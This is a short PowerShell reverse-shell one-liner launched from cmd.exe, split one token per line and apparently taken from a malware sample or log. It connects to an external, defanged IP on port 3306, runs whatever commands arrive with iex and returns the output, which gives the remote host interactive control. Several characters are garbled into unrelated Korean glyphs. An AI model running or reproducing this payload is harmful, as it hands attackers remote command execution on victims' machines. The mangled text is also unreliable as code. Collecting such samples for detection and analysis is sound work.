cmd.exe
/c
몮
powersh펿l
-nop
-c
몮
$
client
=
New-Object
System.Net.Sockets.TCPClient
(
몬
200.159.87
[
.
]
196
몭
,3306
)
;
$
str펴m
=
$
client.G폆Stream
(
)
;
[
byte
[
]
]
$
bytes
=
0
..
65535|
%
{
0
}
;
while
(
(
$
i
=
$
stream.R펴d
(
$
bytes
,
0
,
$
bytes.Length
)
)
-ne
0
)
{
;
$
data
=
(
New-Object
멨
TypeName
System.Text.ASCIIEncoding
)
.G폆String
(
$
bytes,0
,
$
i
)
;
$
sendback
=
(
iex
$
data
2
>
&
1
|
Out-String
)
;
$
sendback2
=
$
sendback
+
몬
PS
몬
+
(
pwd
)
.Path
+
몬
>
몬
;
$
s폁dbyte
=
(
[
text.encoding
]
:
:ASCII
)
.G폆Bytes
(
$
sendback2
)
;
$
str펴m.Write
(
$
sendbyte,0
,
$
sendbyte.Length
)
;
$
stream.Flush
(
)
}
;
$
client.Close
(
)
몯
2
>
&
1
